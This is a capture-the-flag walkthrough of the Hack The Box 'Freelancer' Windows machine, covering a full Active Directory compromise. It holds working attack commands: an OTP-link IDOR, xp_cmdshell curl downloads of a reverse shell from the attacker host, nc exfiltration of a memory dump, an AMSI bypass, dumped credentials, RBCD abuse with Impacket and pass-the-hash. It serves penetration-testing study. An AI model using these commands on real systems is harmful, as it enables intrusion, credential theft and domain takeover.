Hack The Box / WINDOWS / 2026-03-27
Hack The Box - Freelancer (Windows)
Web logic flaw leads to admin access, MSSQL xp_cmdshell gives shell, memory dump forensics leaks credentials, and RBCD path from lorra199 yields domain admin hash and final Administrator access.
Target
- IP: 10.129.244.224
Recon
sudo nmap -sC -sV 10.129.244.224 -p- -T5 -v
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http nginx 1.25.5
|_http-title: Did not follow redirect to http://freelancer.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.25.5
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-06-05 00:31:42Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
50568/tcp open msrpc Microsoft Windows RPC
50571/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-06-05T00:32:33
|_ start_date: N/A
|_clock-skew: 5h00m01s
Add freelancer.htb to /etc/hosts.
Initial Web Attack Path
Use attached script:
attachments/brute_users.py
Admin profile page:
http://freelancer.htb/accounts/profile/visit/2/
It belongs to John Halond, email:
johnHalond@freelancer.htb
Register as an employer.
Logging in with the new employer credentials fails at first. Run the password-recovery flow for the employer account; after that, login works.
Go to the QR code page. The decoded QR is a link like:
http://freelancer.htb/accounts/login/otp/MTAwMTE=/4b64eacd64a2d67d01c77144d07eac51/
MTAwMTE= is Base64 for 10011 (the current user's id), and the server trusts that path segment to decide which user the OTP login is for. Replace it with Mg== (Base64 for 2, the admin profile id found above):
http://freelancer.htb/accounts/login/otp/Mg==/8a1531291ed9584ac7c93956f8bb95e6/
This logs us in as the admin: an insecure direct object reference in the OTP login flow.
Open admin panel:
http://freelancer.htb/admin/
MSSQL Hash Capture and SQL Execution
Start Responder:
sudo responder -I tun0
From the SQL terminal in the admin panel, force the SQL Server service account to authenticate to the attacker's SMB listener (10.10.14.17 is the attacker's VPN address in this session):
xp_dirtree '\\10.10.14.17\any\thing'
Captured hash:
sql_svc::FREELANCER:7746e2dd07eaaceb:DD9755E8912E304A1E80109FD497EB69:01010000000000000094653CA5B6DA0127221F31235524D00000000002000800450049003600340001001E00570049004E002D004B0057004A003400450033004C00350055004B004D0004003400570049004E002D004B0057004A003400450033004C00350055004B004D002E0045004900360034002E004C004F00430041004C000300140045004900360034002E004C004F00430041004C000500140045004900360034002E004C004F00430041004C00070008000094653CA5B6DA0106000400020000000800300030000000000000000000000000300000EFFE1A23917CC6E21B3DC526B2FBB1DA2F9A029BEE786CB741F1CD5173F0D4730A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0031003700000000000000000
The NetNTLMv2 response did not crack offline, so command execution through the SQL terminal is used instead.
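What Responder printed is a NetNTLMv2 response whose last field is the client's NTLMv2_RESPONSE blob. Reading that blob shows two things worth knowing before spending time on cracking: the target name the client used (cifs/10.10.14.17) confirms the xp_dirtree coercion reached the attacker, and the NetBIOS/DNS names inside (WIN-KWJ4E3L5UKM, EI64.LOCAL) are the spoofed values from Responder's own CHALLENGE_MESSAGE, not anything from freelancer.htb. The parser below is an added Python example written for this page, not code from the writeup or from Responder; its only input is the captured line, the AvId names follow MS-NLMP, and it tolerates the odd-length tail the page's copy has (hashcat -m 5600 rejects such a line as-is).

```python
import struct
from datetime import datetime, timedelta, timezone

# Responder's sql_svc line from the page, split into MS-NLMP structures for
# readability (values are copied, not invented). Everything after the
# MsvAvEOL pair is padding; the page's copy ends with an odd number of hex
# digits, which bytes.fromhex() and hashcat -m 5600 both reject.
CAPTURED = (
    "sql_svc::FREELANCER:7746e2dd07eaaceb:DD9755E8912E304A1E80109FD497EB69:"
    "0101000000000000"                               # RespType, HiRespType, reserved
    "0094653CA5B6DA01"                               # FILETIME timestamp
    "27221F31235524D0"                               # client challenge
    "00000000"                                       # reserved
    "02000800" "4500490036003400"                    # MsvAvNbDomainName
    "01001E00" "570049004E002D004B0057004A003400"
               "450033004C00350055004B004D00"        # MsvAvNbComputerName
    "04003400" "570049004E002D004B0057004A003400450033004C00350055004B004D00"
               "2E0045004900360034002E004C004F00430041004C00"  # MsvAvDnsDomainName
    "03001400" "45004900360034002E004C004F00430041004C00"      # MsvAvDnsComputerName
    "05001400" "45004900360034002E004C004F00430041004C00"      # MsvAvDnsTreeName
    "07000800" "0094653CA5B6DA01"                    # MsvAvTimestamp
    "06000400" "02000000"                            # MsvAvFlags (0x2: MIC present)
    "08003000" "30000000000000000000000000300000"
               "EFFE1A23917CC6E21B3DC526B2FBB1DA2F9A029BEE786CB741F1CD5173F0D473"  # MsvAvSingleHost
    "0A001000" "00000000000000000000000000000000"    # MsvAvChannelBindings
    "09002000" "63006900660073002F00310030002E00310030002E00310034002E0031003700"  # MsvAvTargetName
    "00000000"                                       # MsvAvEOL
    "0000000"                                        # trailing padding as printed (7 digits)
)

# AvId -> name, per MS-NLMP 2.2.2.1 AV_PAIR.
AV_IDS = {
    1: "MsvAvNbComputerName", 2: "MsvAvNbDomainName", 3: "MsvAvDnsComputerName",
    4: "MsvAvDnsDomainName", 5: "MsvAvDnsTreeName", 6: "MsvAvFlags",
    7: "MsvAvTimestamp", 8: "MsvAvSingleHost", 9: "MsvAvTargetName",
    10: "MsvAvChannelBindings",
}
UNICODE_AV = {1, 2, 3, 4, 5, 9}
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def parse_netntlmv2(line):
    """Split a Responder NetNTLMv2 line and decode the NTLMv2_RESPONSE blob."""
    user, _lm_hash, domain, server_challenge, ntproofstr, blob_hex = line.split(":", 5)
    odd = len(blob_hex) % 2 == 1
    if odd:
        # Only padding follows MsvAvEOL, so a dangling nibble can be dropped safely.
        blob_hex = blob_hex[:-1]
    blob = bytes.fromhex(blob_hex)
    if blob[0] != 1 or blob[1] != 1:
        raise ValueError("not an NTLMv2_RESPONSE blob (RespType/HiRespType must be 1)")
    filetime, = struct.unpack_from("<Q", blob, 8)
    client_challenge = blob[16:24].hex()
    av, off = {}, 28                                  # AV pairs start after the 4 reserved bytes
    while True:
        av_id, av_len = struct.unpack_from("<HH", blob, off)
        value = blob[off + 4:off + 4 + av_len]
        off += 4 + av_len
        if av_id == 0:                                # MsvAvEOL
            break
        name = AV_IDS.get(av_id, "MsvAv%#06x" % av_id)
        if av_id in UNICODE_AV:
            av[name] = value.decode("utf-16-le")
        elif av_id == 6:
            av[name] = struct.unpack("<I", value)[0]
        elif av_id == 7:
            av[name] = struct.unpack("<Q", value)[0]
        else:
            av[name] = value.hex()
    return {
        "user": user, "domain": domain,
        "server_challenge": server_challenge.lower(),
        "ntproofstr": ntproofstr.lower(),
        "client_challenge": client_challenge,
        "filetime": filetime,
        "timestamp": FILETIME_EPOCH + timedelta(microseconds=filetime // 10),
        "av_pairs": av,
        "blob_hex": blob_hex.lower(),
        "odd_length_trailer": odd,
    }


def to_hashcat_5600(parsed):
    """Re-emit the line in hashcat -m 5600 format with an even-length blob."""
    return "%s::%s:%s:%s:%s" % (parsed["user"], parsed["domain"], parsed["server_challenge"],
                                parsed["ntproofstr"], parsed["blob_hex"])


if __name__ == "__main__":
    info = parse_netntlmv2(CAPTURED)
    print(info["user"], info["domain"], info["timestamp"].isoformat())
    for name, value in info["av_pairs"].items():
        print("  %-22s %s" % (name, value))
    print(to_hashcat_5600(info))
```

The MsvAvTimestamp inside the AV pairs must equal the blob's own timestamp field, and MsvAvFlags 0x2 means a MIC was sent; both are the sanity checks to make before feeding the to_hashcat_5600() output to hashcat -m 5600, since a blob that fails them was mangled in transcription and will never crack.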
Start HTTP server:
python3 -m http.server 80
Enable command execution through the SQL terminal. The application's database login is allowed to impersonate sa, so the sysadmin-only sp_configure changes succeed after EXECUTE AS LOGIN = 'sa':
EXECUTE AS LOGIN = 'sa'
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
EXEC xp_cmdshell 'curl http://10.10.16.12/'
Result:
HTTP request received on attacker server.
Upload and run reverse shell script (attached file attachments/rev):
EXECUTE AS LOGIN = 'sa'
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
EXEC xp_cmdshell 'curl http://10.10.16.12/rev -o C:\Windows\Temp\rev'
EXECUTE AS LOGIN = 'sa'
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
EXEC xp_cmdshell 'python C:\Windows\Temp\rev'
Result:
Reverse shell as sql_svc.
Credential Reuse to mikasaAckerman
dir C:\Users
06/04/2024 09:28 AM <DIR> Administrator
05/28/2024 10:23 AM <DIR> lkazanof
05/28/2024 10:23 AM <DIR> lorra199
05/28/2024 10:22 AM <DIR> mikasaAckerman
08/27/2023 01:16 AM <DIR> MSSQLSERVER
05/28/2024 02:13 PM <DIR> Public
05/28/2024 10:22 AM <DIR> sqlbackupoperator
05/28/2024 11:16 AM <DIR> sql_svc
type C:\Users\sql_svc\Downloads\SQLEXPR-2019_x64_ENU\sql-Configuration.INI
SQLSVCACCOUNT="FREELANCER\sql_svc"
SQLSVCPASSWORD="IL0v3ErenY3ager"
SQLSYSADMINACCOUNTS="FREELANCER\Administrator"
SECURITYMODE="SQL"
SAPWD="t3mp0r@ryS@PWD"
The SQLSVCPASSWORD value also works for mikasaAckerman (password reuse, confirmed below). Upload RunasCs:
https://github.com/antonioCoco/RunasCs
.\RunasCs.exe "mikasaAckerman" "IL0v3ErenY3ager" "whoami"
freelancer\mikasaackerman
Start listener:
nc -vlnp 4444
Run reverse shell as mikasaAckerman:
.\RunasCs.exe "mikasaAckerman" "IL0v3ErenY3ager" "python C:\temp\rev"
Result:
Reverse shell as mikasaAckerman.
Memory Dump Exfiltration and Secrets Extraction
Read mail note:
type Desktop\mail.txt
Hello Mikasa,
I tried once again to work with Liza Kazanoff after seeking her help to troubleshoot the BSOD issue on the "DATACENTER-2019" computer. As you know, the problem started occurring after we installed the new update of SQL Server 2019.
I attempted the solutions you provided in your last email, but unfortunately, there was no improvement. Whenever we try to establish a remote SQL connection to the installed instance, the server's CPU starts overheating, and the RAM usage keeps increasing until the BSOD appears, forcing the server to restart.
Nevertheless, Liza has requested me to generate a full memory dump on the Datacenter and send it to you for further assistance in troubleshooting the issue.
Best regards,
Desktop contains MEMORY.7z.
Upload nc64.exe:
https://github.com/int0x33/nc.exe/
Attacker side:
nc -vlnp 5555 -w1 > MEMORY.7z
Victim side:
.\nc64.exe 10.10.16.12 5555 < MEMORY.7z
Extract archive and inspect MEMORY.DMP.
Use MemProcFS and plugins:
https://github.com/ufrisk/MemProcFS
https://github.com/ufrisk/MemProcFS-plugins
Copy plugin folders into MemProcFS plugins directory.
Start MemProcFS:
MemProcFS_files_and_binaries_v5.9.17-win_x64-20240603\MemProcFS.exe -device MEMORY\MEMORY.DMP
From M:\py\regsecrets\all:
============== SAM hive secrets ==============
HBoot Key: ea5f053efa118386e50003fe8d99078310101010101010101010101010101010
Administrator:500:aad3b435b51404eeaad3b435b51404ee:725180474a181356e53f4fe3dffac527:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:04fc56dd3ee3165e966ed04ea791d7a7:::
============== SECURITY hive secrets ==============
Iteration count: 10240
Secrets structure format : VISTA
LSA Key: c6a7057cad4f93923c45b26cbaaa5550ce747620c8ef8772e53dccb70f55889e
NK$LM Key: 40000000000000000000000000000000634d9d4c85ef33ffa5e14de2dca12075d220eaa9bce0db7dbe77e9be6ead47ec2602e1f6bff5c5ccf9d67a16491c43c5776de0a8c6241536bf27499619b96320fe8905909f598175c930e9b170818d39
FREELANCER.HTB/Administrator:*2023-10-04 12:55:34*$DCC2$10240#Administrator#67a0c0f193abd932b55fb8916692c361
FREELANCER.HTB/lorra199:*2023-10-04 12:29:00*$DCC2$10240#lorra199#7ce808b78e75a5747135cf53dc6ac3b1
FREELANCER.HTB/liza.kazanof:*2023-10-04 17:31:23*$DCC2$10240#liza.kazanof#ecd6e532224ccad2abcf2369ccb8b679
=== LSA Machine account password ===
History: False
NT: 1003ddfa0a470017188b719e1eaae709
Password(hex): a680a4af30e045066419c6f52c073d738241fa9d1cff591b951535cff5320b109e65220c1c9e4fa891c9d1ee22e990c4766b3eb63fb3e2da67ebd19830d45c0ba4e6e6df93180c0a7449750655edd78eb848f757689a6889f3f8f7f6cf53e1196a528a7cd105a2eccefb2a17ae5aebf84902e3266bbc5db6e371627bb0828c2a364cb01119cf3d2c70d920328c814cad07f2b516143d86d0e88ef1504067815ed70e9ccb861f57394d94ba9f77198e9d76ecadf8cdb1afda48b81f81d84ac62530389cb64d412b784f0f733551a62ec0862ac2fb261b43d79990d4e2bfbf4d7d4eeb90ccd7dc9b482028c2143c5a6010
Kerberos password(hex): e882a6eabea4ee80b0d985e1a5a4ef9786dcace78cbde48682e9b7baefbc9ce1ad99e19695ecbcb5e38bb5e1808be6969ee0b0a2e9b89ceaa18feca691eebb91eea4a2ec9290e6adb6eb98beeb8cbfefbfbdeeada7e9a391ed90b0e0ad9cee9aa4efbfbde1a293e0a88ce4a5b4d9b5eeb595e8bb97e4a2b8e59fb7e9a9a8e8a5a8efa3b3ef9bb7e58f8fe1a7a1e589aae7b28ad791eeb2a2efaf8ee19caae5aaaeefa3abc989e29ba3ebb1abeb999de787a3e7ada2e88ab0e2aa8ce4b0b6e186b0ecbc99e2b0bdefbfbde388a0e8868ceab58cef8887e19ab5e3b494ed8286e8bba8e583b1e69d80e5ba81e0bb97ecae9ce1be86e3a597e9918de9bebae1a5b7e9b68eeeb1b6efa2adeb878defbfbdeba188e8849fe4ab98e29786e3a0b0eb9a9ce4858de7a0abe0bd8fe395b3ea9991ec80aee2aa86efaf82e1aca6ed9d83e98299ee8b94ebbebfe7b58deead8eecb290efbfbde4a29be2a0a0e19382e5a8bce181a0
=== LSA Machine account password ===
History: True
NT: 4e7857719aec1e3f13e79f28f68bb95d
Password(hex): 3300740032004300770065003b0038004b00780021003a0062002c0072003d0034002300280024007a002a006a006900450049005000220031003000600063002d0049002500680060004000280029002300560077004f0027006e005d0042006c007300510043003a00230055005100410048004b006e003b0024003900430030004000200047007400420049003300430048005f0036006200740024003b002000750052002500530067006500420066004d004d00600076005a0030004000740038005b003300460067004400620058006f0051005e004c0036005a00370072004200780038003900200078003a00
Kerberos password(hex): 3374324377653b384b78213a622c723d342328247a2a6a6945495022313060632d492568604028292356774f276e5d426c7351433a23555141484b6e3b243943304020477442493343485f366274243b2075522553676542664d4d60765a304074385b3346674462586f515e4c365a37724278383920783a
=== LSA DPAPI secret ===
History: False
Machine key (hex): cf1bc407d272ade7e781f17f6f3a3fc2b82d16bc
User key(hex): 6d210ab98889fac8829a1526a5d6a2f76f8f9d53
=== LSA DPAPI secret ===
History: True
Machine key (hex): ee8c9b3c041dc01afb54b421d4fafa0bbd314c1c
User key(hex): a3a744a52e541603869eef3ee06191dd8597db83
=== LSASecret NL$KM ===
History: False
Secret:
00000000: 63 4d 9d 4c 85 ef 33 ff a5 e1 4d e2 dc a1 20 75 |cM.L..3...M... u|
00000010: d2 20 ea a9 bc e0 db 7d be 77 e9 be 6e ad 47 ec |. .....}.w..n.G.|
00000020: 26 02 e1 f6 bf f5 c5 cc f9 d6 7a 16 49 1c 43 c5 |&.........z.I.C.|
00000030: 77 6d e0 a8 c6 24 15 36 bf 27 49 96 19 b9 63 20 |wm...$.6.'I...c |
=== LSASecret NL$KM ===
History: True
Secret:
00000000: 63 4d 9d 4c 85 ef 33 ff a5 e1 4d e2 dc a1 20 75 |cM.L..3...M... u|
00000010: d2 20 ea a9 bc e0 db 7d be 77 e9 be 6e ad 47 ec |. .....}.w..n.G.|
00000020: 26 02 e1 f6 bf f5 c5 cc f9 d6 7a 16 49 1c 43 c5 |&.........z.I.C.|
00000030: 77 6d e0 a8 c6 24 15 36 bf 27 49 96 19 b9 63 20 |wm...$.6.'I...c |
=== LSA Service User Secret ===
History: False
Service name: _SC_MSSQL$DATA
Username: UNKNOWN
00000000: 50 57 4e 33 44 23 6c 30 72 72 40 41 72 6d 65 73 |PWN3D#l0rr@Armes|
00000010: 73 61 31 39 39 |sa199|
=== LSA Service User Secret ===
History: True
Service name: _SC_MSSQL$DATA
Username: UNKNOWN
00000000: 4d 53 53 51 4c 53 33 72 76 33 72 50 40 73 73 77 |MSSQLS3rv3rP@ssw|
00000010: 64 23 30 39 |d#09|
============== SOFTWARE hive secrets ==============
default_logon_user:
The LSA service secret for _SC_MSSQL$DATA is the plaintext password of the account the MSSQL$DATA service runs as on DATACENTER-2019, and the same password is valid for lorra199 on the DC. Use it with RunasCs:
.\RunasCs.exe "lorra199" "PWN3D#l0rr@Armessa199" "whoami"
freelancer\lorra199
Connect with Evil-WinRM:
evil-winrm -i 10.129.151.151 -u 'lorra199' -p 'PWN3D#l0rr@Armessa199'
AD Privilege Escalation (RBCD)
Collect BloodHound data:
bloodhound-python -u 'lorra199' -p 'PWN3D#l0rr@Armessa199' -ns 10.129.151.151 -d 'freelancer.htb' -dc 'dc.freelancer.htb' -c All
Finding:
lorra199 is a member of the AD Recycle Bin group, which has GenericWrite on dc.freelancer.htb. GenericWrite on the DC's computer object lets us write msDS-AllowedToActOnBehalfOfOtherIdentity, i.e. configure resource-based constrained delegation (RBCD) to the DC from a computer account we control.
Many scripts are blocked by AV on the host, so the AMSI bypass below is applied before loading PowerView and Powermad.
Reference:
https://pentestlaboratories.com/2021/05/17/amsi-bypass-methods/
AMSI bypass used:
$w = 'System.Management.Automation.A';$c = 'si';$m = 'Utils'
$assembly = [Ref].Assembly.GetType(('{0}m{1}{2}' -f $w,$c,$m))
$field = $assembly.GetField(('am{0}InitFailed' -f $c),'NonPublic,Static')
$field.SetValue($null,$true)
Load PowerView:
https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
. .\PowerView.ps1
Load Powermad:
https://github.com/Kevin-Robertson/Powermad
. .\Powermad.ps1
Create a computer account (Powermad adds it over LDAP; this works for a plain domain user as long as ms-DS-MachineAccountQuota is above zero, and the default is 10):
New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
Get SID:
$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
Alternative:
get-adcomputer attackersystem -prop sid
Set RBCD ACL:
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
$targetComputer = "dc.freelancer.htb"
Get-DomainComputer $targetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
Alternative write with Impacket:
impacket-rbcd -delegate-from 'attackersystem$' -delegate-to 'DC$' -action write -dc-ip 10.129.244.224 'freelancer.htb/lorra199:PWN3D#l0rr@Armessa199'
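The SDDL string used above, O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;<SID>), is Builtin\Administrators as owner plus a single ACCESS_ALLOWED ACE granting the full generic and standard right set to the new computer account; msDS-AllowedToActOnBehalfOfOtherIdentity stores that descriptor in self-relative binary form, which is what the PowerShell obtains from GetBinaryForm. The Python below is an added example, not code from the writeup, PowerView, Powermad or Impacket: it builds the equivalent self-relative descriptor without .NET and decodes one back, which is also the check a defender runs against the DC$ object to see which SIDs are trusted for RBCD. The delegate SID is a constructed placeholder, since the page does not show attackersystem's SID.

```python
import struct

# Access-right bits in the order the page's SDDL ACE string lists them
# ("CCDCLCSWRPWPDTLOCRSDRCWDWO"), so decoding reproduces that string.
RIGHTS = [
    ("CC", 0x00000001), ("DC", 0x00000002), ("LC", 0x00000004), ("SW", 0x00000008),
    ("RP", 0x00000010), ("WP", 0x00000020), ("DT", 0x00000040), ("LO", 0x00000080),
    ("CR", 0x00000100), ("SD", 0x00010000), ("RC", 0x00020000), ("WD", 0x00040000),
    ("WO", 0x00080000),
]
RIGHT_BY_CODE = dict(RIGHTS)
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"      # the "BA" alias in "O:BA"
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
ACL_REVISION = 2

# Constructed placeholder; the real attackersystem$ SID is not on the page.
EXAMPLE_DELEGATE_SID = "S-1-5-21-1111111111-2222222222-3333333333-1105"


def rights_to_mask(rights):
    """'CCDCLC...' -> ACCESS_MASK; unknown two-letter codes raise KeyError."""
    if len(rights) % 2:
        raise ValueError("SDDL rights string must be pairs of letters")
    mask = 0
    for i in range(0, len(rights), 2):
        mask |= RIGHT_BY_CODE[rights[i:i + 2]]
    return mask


def mask_to_rights(mask):
    return "".join(code for code, bit in RIGHTS if mask & bit)


def sid_to_bytes(sid):
    """'S-1-5-21-...' -> binary SID: revision, count, 48-bit authority (BE), sub-authorities (LE)."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError("not a SID string: %r" % sid)
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", 1, len(subs)) + int(parts[2]).to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(buf, off):
    """Decode a binary SID at buf[off:]; returns (sid string, byte length)."""
    rev, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d%s" % (rev, authority, "".join("-%d" % s for s in subs)), 8 + 4 * count


def build_rbcd_descriptor(delegate_sid, owner_sid=BUILTIN_ADMINISTRATORS,
                          rights="CCDCLCSWRPWPDTLOCRSDRCWDWO"):
    """Self-relative SECURITY_DESCRIPTOR equivalent to 'O:BAD:(A;;<rights>;;;<delegate_sid>)'."""
    owner = sid_to_bytes(owner_sid)
    trustee = sid_to_bytes(delegate_sid)
    # ACCESS_ALLOWED_ACE: type, flags, size, mask, trustee SID
    ace = struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(trustee),
                      rights_to_mask(rights)) + trustee
    # ACL: revision, sbz1, size, ace count, sbz2
    dacl = struct.pack("<BBHHH", ACL_REVISION, 0, 8 + len(ace), 1, 0) + ace
    # Header: revision, sbz1, control, owner/group/sacl/dacl offsets (no group, no SACL)
    header_len = 20
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         header_len, 0, 0, header_len + len(owner))
    return header + owner + dacl


def parse_allowed_to_act(sd):
    """Decode an msDS-AllowedToActOnBehalfOfOtherIdentity value: (owner SID, [(trustee SID, mask)])."""
    rev, _, control, o_owner, _o_group, _o_sacl, o_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if rev != 1:
        raise ValueError("unexpected security descriptor revision %d" % rev)
    owner = bytes_to_sid(sd, o_owner)[0] if o_owner else None
    entries = []
    if control & SE_DACL_PRESENT and o_dacl:
        _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, o_dacl)
        off = o_dacl + 8
        for _ in range(ace_count):
            ace_type, _, ace_size = struct.unpack_from("<BBH", sd, off)
            if ace_type == ACCESS_ALLOWED_ACE_TYPE:
                mask, = struct.unpack_from("<I", sd, off + 4)
                entries.append((bytes_to_sid(sd, off + 8)[0], mask))
            off += ace_size                      # skip object ACEs and anything else
    return owner, entries


if __name__ == "__main__":
    sd = build_rbcd_descriptor(EXAMPLE_DELEGATE_SID)
    print(len(sd), "bytes:", sd.hex())
    owner, allowed = parse_allowed_to_act(sd)
    print("owner:", owner)
    for sid, mask in allowed:
        print("trusted for delegation:", sid, "rights:", mask_to_rights(mask))
```

Writing the bytes to the DC object still needs the LDAP modify (Set-DomainObject or impacket-rbcd do that). The decoder is the part to keep: run it over the live msDS-AllowedToActOnBehalfOfOtherIdentity value of DC$ after the engagement, and any SID it lists that is not expected is an RBCD backdoor that survived cleanup.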
Request a service ticket for cifs/dc.freelancer.htb as Administrator with the new computer account's credentials (getST does S4U2Self followed by S4U2Proxy). Sync the clock first: the nmap scan showed a 5-hour skew, far beyond what Kerberos tolerates:
sudo ntpdate 10.129.244.224; impacket-getST -spn 'cifs/dc.freelancer.htb' -impersonate 'Administrator' 'freelancer.htb/attackersystem$:Summer2018!'
Point Impacket at the cache file getST saved (check the file name it prints; newer Impacket releases name it Administrator@cifs_dc.freelancer.htb@FREELANCER.HTB.ccache):
export KRB5CCNAME=`pwd`/Administrator.ccache
Dump Administrator secrets:
sudo ntpdate 10.129.244.224; impacket-secretsdump -k -no-pass -just-dc-user Administrator dc.freelancer.htb
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0039318f1e8274633445bce32ad1a290:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:1743fa93ed1f2f505d3c7cd6ef1e8c40589f107070065e98efc89ea907d81601
Administrator:aes128-cts-hmac-sha1-96:bd23b1924f1fd0bdc60abf464114a867
Administrator:des-cbc-md5:0d400dfe572a3262
Final shell:
evil-winrm -i 10.129.244.224 -u 'Administrator' -H '0039318f1e8274633445bce32ad1a290'